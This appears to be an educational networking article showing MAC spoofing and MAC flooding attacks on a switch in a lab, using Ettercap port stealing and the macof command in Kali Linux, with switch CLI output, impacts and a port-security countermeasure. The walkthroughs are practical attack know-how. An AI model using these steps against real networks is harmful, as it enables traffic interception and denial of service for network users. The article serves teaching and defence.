Contents

Introduction
MAC Address Table Theory
MAC Spoofing Attack
MAC Flooding Attack
Impact
  Information Exposure
  Network Performance Decrease / Service Unavailable
  Man-in-the-middle Attack
Countermeasure

Introduction

MAC Address Table is an important component of a switch. If the MAC Address Table is attacked, it may decrease the network performance, cause information exposure or even Man-in-the-middle attack. We will try to use some free tools to simulate the attack.

⛑️  Please be reminded that the aim of this article is to explain the network threats and how to eliminate the issue. Illegal activities are not encouraged⛑️

MAC Address Table Theory

Switch learns the MAC Address and record in the MAC Address Table every second. According to the records, switch know what MAC Addresses are attached to the ports so that it can deliver the data frame to the correct port.

Since it do not have any verifying mechanism for the MAC Address Table system by the default setting, switch will trust the source MAC Addresses that received from every port and put them in to the MAC Address Table. So, an attacker can put a fake MAC Address in the frame and send out to make the switch learn the fake address and the normal operation of the switch will be influenced.

MAC Spoofing Attack

I will talk about the MAC Spoofing Attack first. Attacker put a fake MAC Address in the data frame and sends out to the switch. The MAC Address is identical to that of another host (victim) in the same network. After that, all messages that should be delivered to the victim will be wrongly redirected to the attacker. Please see the following figures.

Mac Address Table Attack

In normal operation, switch use MAC Address Table to record the MAC Addresses and Ports of hosts.

  • 1️⃣  PC1 want to send a frame to PC2. So PC1 put PC2's MAC Address (ABCD.EF00.0002) in the Destination Address of the frame and send to the switch
  • 2️⃣  Switch check the MAC Address Table and find that the destination should be at Port Fa0/2
  • 3️⃣  Switch send the frame to Fa0/2

Mac Address Table Attack

In the situation of the network that is under MAC Spoofing Attack,

  • 1️⃣  Attacker put PC2's MAC Address (ABCD.EF00.0002) in the Source Address of the frame and send to Switch
  • 2️⃣  Switch think that ABCD.EF00.0002 is at Fa0/3 and update its MAC Address Table
  • 3️⃣  PC1 want to send a Frame to PC2
  • 4️⃣  According to the MAC Address Table, Switch send the Frame to the attacker wrongly

Now, we can use the tool Ettercap in Kali Linux to simulate the attack.

Mac Address Table Attack

Choose Sniff ➡️  Unified Sniffing, then choose the interface where the attack is going to be implemented.

Mac Address Table Attack

Choose Hosts ➡️  Scan for hosts, then Hosts ➡️  Hosts list, all hosts that attached to the network are shown.

Mac Address Table Attack

Before the attack, check the MAC Address Table of the switch first. Hosts are connected to Gi1/0/1 and Fa1/0/1. Attacker is connected to Fa1/0/24 and is ready to start the attack.

SW#show mac address-table dynamic 
          Mac Address Table
-------------------------------------------

Vlan    Mac Address       Type        Ports
----    -----------       --------    -----
   1    0016.468f.c381    DYNAMIC     Gi1/0/2
   1    0016.468f.c382    DYNAMIC     Gi1/0/1
   1    0016.468f.c3c0    DYNAMIC     Gi1/0/1
   1    001e.7a37.c8e5    DYNAMIC     Fa1/0/1
   1    f01e.3412.0f4d    DYNAMIC     Fa1/0/24
Total Mac Addresses for this criterion: 5

Back to Ettercap, choose Mitm ➡️  Port Stealing to start the attack. So what have the tool done? We can check by using WireShark. Attacker send out ARP Requests to the switch continuously but the Source Address is written as the victims.

Mac Address Table Attack

Check the MAC Address Table of the switch now. The records which forward to Gi1/0/1 and Fa1/0/1 (Victim's port) is updated to Fa1/0/24 (Attacker's port).

SW#show mac address-table dynamic 
          Mac Address Table
-------------------------------------------

Vlan    Mac Address       Type        Ports
----    -----------       --------    -----
   1    0016.468f.c381    DYNAMIC     Gi1/0/2
   1    0016.468f.c382    DYNAMIC     Gi1/0/1
   1    0016.468f.c3c0    DYNAMIC     Fa1/0/24
   1    001e.7a37.c8e5    DYNAMIC     Fa1/0/24
   1    f01e.3412.0f4d    DYNAMIC     Fa1/0/24
Total Mac Addresses for this criterion: 5

Use WireShark and we can see all the communication between victims are sent to the attacker.

Mac Address Table Attack

MAC Flooding Attack

The memory spaces are limited for the MAC Address Table of a switch. It is only about several thousand for low level models to hundreds of thousands for advance models. If the MAC Address table is full of fake records, switch cannot find out the port of destination by checking the table. In this situation, switch will use Broadcast to transmit messages. Broadcast wastes network bandwidth and the most serious problem is the transmitted messages will be exposure and can be captured by anyone.

To check the maximum capacity of the MAC Address Table of a switch, use show mac address-table count.

SW#show mac address-table count

Mac Entries for Vlan 1:
---------------------------
Dynamic Address Count  : 3
Static  Address Count  : 0
Total Mac Addresses    : 3

Total Mac Address Space Available: 5564

We want to fill in the remaining 5564 spaces, use macof in Kali Linux to do the Flooding.

Open Terminal and input macof -e <interface>, macof will generate MAC Address randomly, put them in to frame and send out to the switch.

root@kali:~# macof --help
macof: invalid option -- '-'
Version: 2.4
Usage: macof [-s src] [-d dst] [-e tha] [-x sport] [-y dport]
             [-i interface] [-n times]
root@kali:~# macof -e eth1
e3:8b:88:3:b4:cd d8:25:98:35:61:87 0.0.0.0.9537 > 0.0.0.0.18576: S 1905213613:1905213613(0) win 512
91:33:3b:3:a0:f5 d6:11:53:f:5e:c8 0.0.0.0.8066 > 0.0.0.0.49105: S 428779274:428779274(0) win 512
c4:27:40:74:3d:11 b9:a5:d3:1d:e:bf 0.0.0.0.8772 > 0.0.0.0.42343: S 1206065071:1206065071(0) win 512
9a:d7:d9:6a:fd:ee 9b:e8:7:15:e4:1d 0.0.0.0.44381 > 0.0.0.0.7072: S 352131538:352131538(0) win 512
42:33:77:69:9b:65 ef:3b:4c:19:e2:bd 0.0.0.0.24920 > 0.0.0.0.19837: S 1039619585:1039619585(0) win 512
a:60:b2:3d:fc:af d3:7c:5b:36:4a:61 0.0.0.0.17578 > 0.0.0.0.4432: S 727135709:727135709(0) win 512
18:75:26:4c:a8:23 10:81:2a:12:e1:be 0.0.0.0.42271 > 0.0.0.0.61161: S 1071867223:1071867223(0) win 512
98:15:eb:38:f3:c1 c8:d7:c1:61:be:a3 0.0.0.0.30693 > 0.0.0.0.57646: S 1759104040:1759104040(0) win 512
dc:6d:43:15:be:52 99:19:41:22:4e:36 0.0.0.0.29211 > 0.0.0.0.63665: S 481173385:481173385(0) win 512
42:d5:ac:47:75:fd 2:3c:f5:3a:29:b0 0.0.0.0.14787 > 0.0.0.0.57718: S 1888990933:1888990933(0) win 512
4d:ed:18:48:f0:f5 4b:ba:a5:66:ef:ee 0.0.0.0.54900 > 0.0.0.0.37268: S 397896255:397896255(0) win 512

<--Output Omitted-->

Switch will trust and put all the MAC Addresses in to the MAC Address Table.

SW#show mac address-table       
          Mac Address Table
-------------------------------------------

Vlan    Mac Address       Type        Ports
----    -----------       --------    -----
   1    0008.3714.23ca    DYNAMIC     Fa1/0/23
   1    000a.b745.4d74    DYNAMIC     Fa1/0/23
   1    000e.8528.b694    DYNAMIC     Fa1/0/23
   1    0010.60dd.4d6a    DYNAMIC     Fa1/0/23
   1    0016.468f.c381    DYNAMIC     Gi1/0/2
   1    0016.468f.c382    DYNAMIC     Gi1/0/1
   1    001a.8b7b.69ad    DYNAMIC     Fa1/0/23
   1    001e.7a37.c8e5    DYNAMIC     Fa1/0/1
   1    0026.0c02.85ab    DYNAMIC     Fa1/0/23
   1    0027.ab5e.0c9f    DYNAMIC     Fa1/0/23
   1    002b.9f19.7c59    DYNAMIC     Fa1/0/23
   1    0033.7a1b.27a6    DYNAMIC     Fa1/0/23
   1    0040.145f.9b17    DYNAMIC     Fa1/0/23
   1    005f.9b5c.ffa7    DYNAMIC     Fa1/0/23
   1    0061.eb6f.174d    DYNAMIC     Fa1/0/23
   1    0075.a023.e467    DYNAMIC     Fa1/0/23
   1    0076.7375.dc6d    DYNAMIC     Fa1/0/23
   1    007a.470f.f51a    DYNAMIC     Fa1/0/23
   1    007d.b144.c298    DYNAMIC     Fa1/0/23
   1    0087.7941.3cd3    DYNAMIC     Fa1/0/23

<--Output Omitted-->

After few seconds, MAC Address Table is full.

SW#show mac address-table count 

Mac Entries for Vlan 1:
---------------------------
Dynamic Address Count  : 6024
Static  Address Count  : 0
Total Mac Addresses    : 6024

Total Mac Address Space Available: 0

Keep the attack run for more than 5 minutes, the old records (which are real) will be deleted since the Timeout setting of MAC Address Table is 5 minutes by default. MAC Address Table will be filled by fake records, the real entries are not able to be saved. Thus, switch will send the frame by broadcast.

Now, the Broadcast Frames can be captured by WireShark.

Mac Address Table Attack

Impact

There are 3 Impacts for MAC Address Table attack,

Information Exposure

Attackers interfere the normal operation of a switch so that they can receive the communication messages between victims. If the messages are not encrypted, the information will be exposure. Even the messages are already encrypted, attacker can gather users’ information and habits such as the visited websites. They may perform other attacks by Social Engineering.

Network Performance Decrease / Service Unavailable

Network performance is decreased due to the Broadcast. Some switches may be halted since they cannot handle a large amount of MAC Address records.

Man-in-the-middle Attack

If attacker spoof as a Default Gateway of the network, they can perform Man-in-the-middle Attack to capture or modify all messages that are passed to other networks or Internet.

Mac Address Table Attack

Countermeasure

Use Port Security to limit the MAC Address that attached to the ports can be used to eliminate MAC Address Table Attack. Please check Port Security for details.